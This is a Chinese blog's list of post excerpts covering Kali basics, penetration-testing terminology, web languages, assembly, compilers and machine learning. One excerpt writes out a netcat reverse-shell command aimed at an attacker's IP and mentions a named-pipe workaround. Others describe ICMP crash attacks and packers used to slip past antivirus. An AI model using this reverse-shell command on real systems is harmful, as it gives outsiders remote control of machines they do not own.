- 博客(29)
- 收藏
- 关注
RSS订阅原创 Kali基础知识
网络和监控命令类似于这些: hostname, ping, ifconfig, iwconfig, netstat, nslookup, traceroute, finger, telnet, ethtool 用于查看 linux 服务器 ip 地址,管理服务器网络配置,通过 telnet 和 ethernet 建立与 linux 之间的网络链接,查看 linux 的服务器信息等。这个命令,会把本地已安装的软件,与刚下载的软件列表里对应软件进行对比,如果发现已安装的软件版本太低,就会提示你更新。
2024-12-26 10:24:13
482
原创 VMware Workstation虚拟机网络模式
假设你家申请到了一个公网IP,那么你可以访问公网,公网上的其他IP也可以访问你,但是如果你家有很多台设备要上网,仅有一个公网IP是不够用的,于是就可以利用路由器的NAT功能,让路由器给家庭内部的不同设备分配不同的私网地址,当这些设备要向外发送数据时,NAT就把私有地址转换成公网地址,并且可以用端口进行标识,当数据从公网向设备传递时,NAT再把公网地址转换成私有地址。虚拟出来的网段和NAT模式虚拟网卡的网段是一样的,包括NAT服务器的IP地址也是这个网段。所以两个网卡的IP地址也要设置为同一网段。
2024-12-24 15:21:25
915
原创 渗透测试(入侵检测)基本术语(二)
用于在IP主机、路由器之间传递控制消息,包括网络通不通、主机是否可达、路由是否可用等消息,常用的Ping命令就是基于ICMP协议的,该协议对于网络安全有着重要意义,它本身的特性决定了它非常容易被用于攻击网络上的路由器和主机,例如海信主页被黑事件就是以ICMP攻击为主,操作系统规定ICMP数据包最大尺寸不超过64KB,因而如果向目标主机发送超过64KB上限的数据包,该主机就会出现内存分配错误,进而导致系统耗费大量的资源处理,最终瘫痪死机。比较常用的一种攻击技术,实施简单但威力巨大,大多是无视防御的。
2024-12-23 13:33:56
675
原创 渗透测试(入侵检测)基本术语(一)
攻击者用来隐藏自己的行踪和保留root访问权限的工具。利用特殊的算法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如压缩、加密),以达到防止反编译、缩小文件体积、加密程序编码、躲过杀毒软件查杀的目的,常见的壳有UPX,ASPack,PePack,PECompact,UPack,免疫007,木马彩衣等。情报收集系统,蜜罐系统是一个故意让人攻击的目标,引诱黑客来攻击,攻击者攻击后,就可以知道他是如何得逞的,还可以通过窃听黑客间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。
2024-12-18 17:07:21
385
原创 PHP基础
1.PHP简述PHP(全称:PHP:Hypertext Preprocessor,即"PHP:超文本预处理器")是一种通用开源脚本语言。PHP 文件可包含文本、HTML、JavaScript代码和 PHP 代码 PHP 代码在服务器上执行,结果以纯 HTML 形式返回给浏览器 PHP 文件的默认文件扩展名是 ".php" PHP 可以生成动态页面内容 PHP 可以创建、打开、读取、写入、关闭服务器上的文件 PHP 可以收集表单数据 PHP 可以发送和接收 cookies PHP 可以添
2024-12-16 16:38:53
851
1
原创 JavaScript基础
4、var arr = new Array(10,20,{"name":"tomy","age":19},0.1,"string",true,["aaa","bbb"])//定义的同时赋值。2、var arr=[10,20,{"name":"tomy","age":19},0.1,"string",true,["aaa","bbb"]]//定义的同时赋值。<input type="button" value="点击一下" onclick="alert('网络安全');
2024-12-13 23:37:03
706
原创 DIV+CSS基础
行内元素的margin、padding属性很特殊,水平方向的padding-left、padding-rigtht、margin-left、padding-right都会产生边距效果,但是竖直方向的padding-top、padding-bottom、margin-top、margin-bottom却不产生边距效果。georgian: 乔治亚数字,例如: an, ban, gan, ..., he, tan, in, in-an, ...参阅:list-style-position 中可能的值。
2024-12-13 15:14:46
250
原创 词法分析器——Token和TokenType
书接上回,实现了缓存流迭代器后,就可以设计开发Token类和TokenType类了。词法分析(Lexical Analysis)是将字符串形式的源代码转换为一系列词法单元(Token)的过程。每个词法单元包括一个词法类型(TokenType),用于表示该单元的种类,比如关键字、标识符、运算符、分隔符、字符串常量等。不同的编程语言会有不同的词法单元种类,每种种类对应一个词法类型。所以Token是源代码中的最小有意义单元。词法分析是编译过程中的第一个阶段,它负责将源代码分解成一系列的标记。这些标记
2024-12-11 17:33:56
525
原创 C++是如何工作的?
首先来看一个最基本的C++程序段。第一行 #include 的含义是预处理的意思,这条语句的作用是将一个名为iostream的文件拷贝到源代码中这个文件通常被称为“头文件”,之所以要拷贝这个文件,是因为后面要使用到的cout、cin就存在于这个文件中(其实如果不怕麻烦,直接把iostream中的内容手动拷贝到源文件中也可以实现同样的效果),在源代码实际编译之前,这段预处理代码就被执行了。
2024-12-11 17:23:54
1064
原创 C语言字符串的坑
C语言原生字符串以‘\0’为结束符,因此不能用C语言的字符串来存储图片数据或其他二进制数据。// str2中包含了'\0',所以字符串被认为是提前结束了。
2024-08-09 21:11:58
191
原创 springboot项目搭建常见的坑
解决方法:jdk版本问题,springboot3只支持java17及以上版本,不支持java1.8版本。如果非要使用sprintboot3,只能将java升级到17版本,如果只想使用java1.8版本,那么就在pom文件中改回到springboot2版本。报错2:尝试运行application,报如下错误,或者报“Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.11.0:compile”的错误。
2024-05-20 11:22:26
882
原创 网络抓包时,谷歌浏览器显示“您的连接不是私密链接”
5.最后在谷歌浏览器“管理证书”窗口中选择“受信任的根证书颁发机构”,然后导入证书,关闭并重新打开浏览器即可。1.点击左上角“不安全“,然后点击”证书无效“。3.点击详细信息,然后在证书层次结构中选中。出现这种问题往往是安全证书出了问题。4.会在指定位置生成证书。2.显示如下所示窗口。
2024-05-13 18:31:31
1043
1
原创 netcat工具无法使用 -e 参数
使用mkfifo或mknod命令创建一个命名管道,然后使用cat命令读取管道中的内容,并将其传递给/bin/sh执行,再将输出重定向到nc连接。nc -e /bin/sh 攻击者的IP 端口。当在linux中使用netcat进行反向连接时,这说明此netcat不支持 -e 参数。
2024-05-11 08:46:34
396
原创 词法分析器实现——缓存流迭代器
缓存流迭代器PeekIterator是词法分析器的基础。我们是将源代码转换成“Stream流”来处理的,通过这个迭代器,就可以对代码的流进行一系列的操作了,包括正则校验、类型判断等。换句话说,这个迭代器就是把代码包含的字符一个一个地取出来,然后进行观察并操作。
2024-05-03 22:55:51
415
原创 基于java原生数组,设计一个动态的数组
些集合类提供了动态增加删除元素的功能,但是数组的访问效率比ArrayList高,所以我们如果在遇到访问较多的情景,最好还是使用数组来存储数据。Java原生数组的大小在创建时就被固定,并且不能更改。这意味着它们是静态的或者说是不可变的。如果你尝试添加或删除数组中的元素,你会得到一个。下面我们就来写一个支持增删改查的动态数组,这样就不用担心数组越界、增加删除元素不方便的一系列问题啦!这种特性会导致我们在使用数组时不太方便,虽然。
2024-04-25 19:26:37
473
原创 java重写自定义类equals和compareTo方法
此时运行结果为false,但是这与常识相反,明明都是名字为Jerry,学号为1011的学生,但是判断结果却为false,所以此时需要重写Student类中的equals方法,不让它进行地址比较。这三个判断逻辑是固定写法,记住即可!
2024-04-23 09:44:01
370
原创 汇编指令分析
计算机通过指令指挥计算机工作。CPU被时钟驱动,不断读取PC指针指向的指令,并移动PC指针,从内存中读取指令并执行(周而复始)。不同的CPU架构使用不同指令,目前比较广泛的是RISC(精简指令集)
2024-04-22 19:58:47
2527
原创 eflags寄存器和条件判断
首先认识汇编中的两类跳转语句无条件跳转:jmp、ret、call。有条件跳转:jcc。jcc是有条件跳转指令,那么它根据什么条件来跳转呢?这就根据eflags寄存器中的ZF位是否为0来决定是否跳转。通过这些跳转指令,去修改eflags寄存器,eflags寄存器不能通过mov eflags 0x100这种方式去修改。。
2024-04-19 19:27:52
791
原创 MBR引导程序简单实现
首先明确一点:主引导记录(MBR,Master Boot Record)是装有Linux系统的硬盘的第一个扇区,即C/H/S地址的0柱面0磁头1扇区,也叫做MBR扇区(来源百度百科)。所以MBR应该是一个硬件。在这里我们简单介绍一下MBR。计算机接电后运行的是BIOS,它完成检测和初始化工作后就会处理器使用权交给MBR。MBR位于整个硬盘最开始的扇区,称为MBR主引导扇区,其内容是:446字节的引导程序和参数;64字节的分区表;2字节结束标级0x55和0xaa。
2024-04-17 23:13:52
2197
原创 归并排序(java递归实现)
由于6大于1,所以把它们两个放到一个临时数组中[1,6],然后再创建一个长度为3的临时数组,开始合并[1,6]和[2],那么我们该如何把数字放到这个临时数组的合适位置呢?首先实现第一步,将数列分成左右两个部分,将数列“打散”,但是“打散”要有一定的套路,逐层从中间分开,最后将所有数字拆出来。通过图我们看到了,打散和合并的过程是对称的,怎么打散的,后来就再怎么合并,只不过在合并的过程中,有一个大小比较的过程,现在将5,4,3,6,1,2从小到大排序,上图!用双指针的思路,再把散掉的数字重新组合在一起。
2024-04-13 08:59:46
851
1
原创 机器学习的任务
1.二分类二选一的分类任务。比如房价涨还是跌、天气晴还是阴、性别是男还是女。2.多分类人脸识别、数字识别、健康状况分级等。很多复杂的问题也可以转换成多分类任务。比如贪吃蛇,我们通过大量数据训练贪吃蛇,让贪吃蛇在每次前进时自己判断左移、右移、上移还是下移,这同样也是一个分类任务。还比如下棋、无人驾驶都可以转换成分类问题。一些算法只支持完成二分类任务,但是多分类的任务可以转换成二分类的任务,有一些算法天然可以完成多分类任务。3.多标签分类。
2024-04-12 22:11:56
1025
原创 机器学习基本概念
机器学习首先要处理的就是大量的数据,比较经典的数据集是鸢尾花数据集。鸢尾花数据集每个样本有四个数据,sepal length、sepal width、petal length、petal width,这些术语的含义如图所示。鸢尾花分为三个种类Virginica、Versicolor、Setosa。这个数据集中的数据都是比较规整的,实际的数据就未必这么完美了,会有很多极端值、缺陷值。
2024-04-11 22:17:50
518
原创 汇编基础知识
VMware虚拟机OD反编译工具Ubuntu16Ubuntu系统中下载:qemu——调试C语言nasm编辑器——sudo apt-get install nasmbochs2.7(必须是2.7版本的,要与bochs配置文件相匹配,其他版本无效)——调试汇编、GDT、IDT、分页。
2024-04-08 15:30:11
1146
原创 写在前面的话
人工智能作为当前比较热门的技术,想要学好并不容易,一般的程序员不容易顺利进入人工智能的研究领域,因为人工智能技术不仅仅需要有较强的编程能力,还需要有很强的数学功底,希望本专栏的课程可以帮助大家顺利进入人工智能领域的大门,当然人工智能的理论博大精深,绝不是这一个专栏就可以讲清楚的,本专栏会选择比较简单、易懂的概念和模型,帮助大家理解人工智能的基本原理,梳理好相关的概念,为以后的转型打好基础。,如果你对这些内容还不熟悉,请先去补课。
2024-03-31 13:36:08
182
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人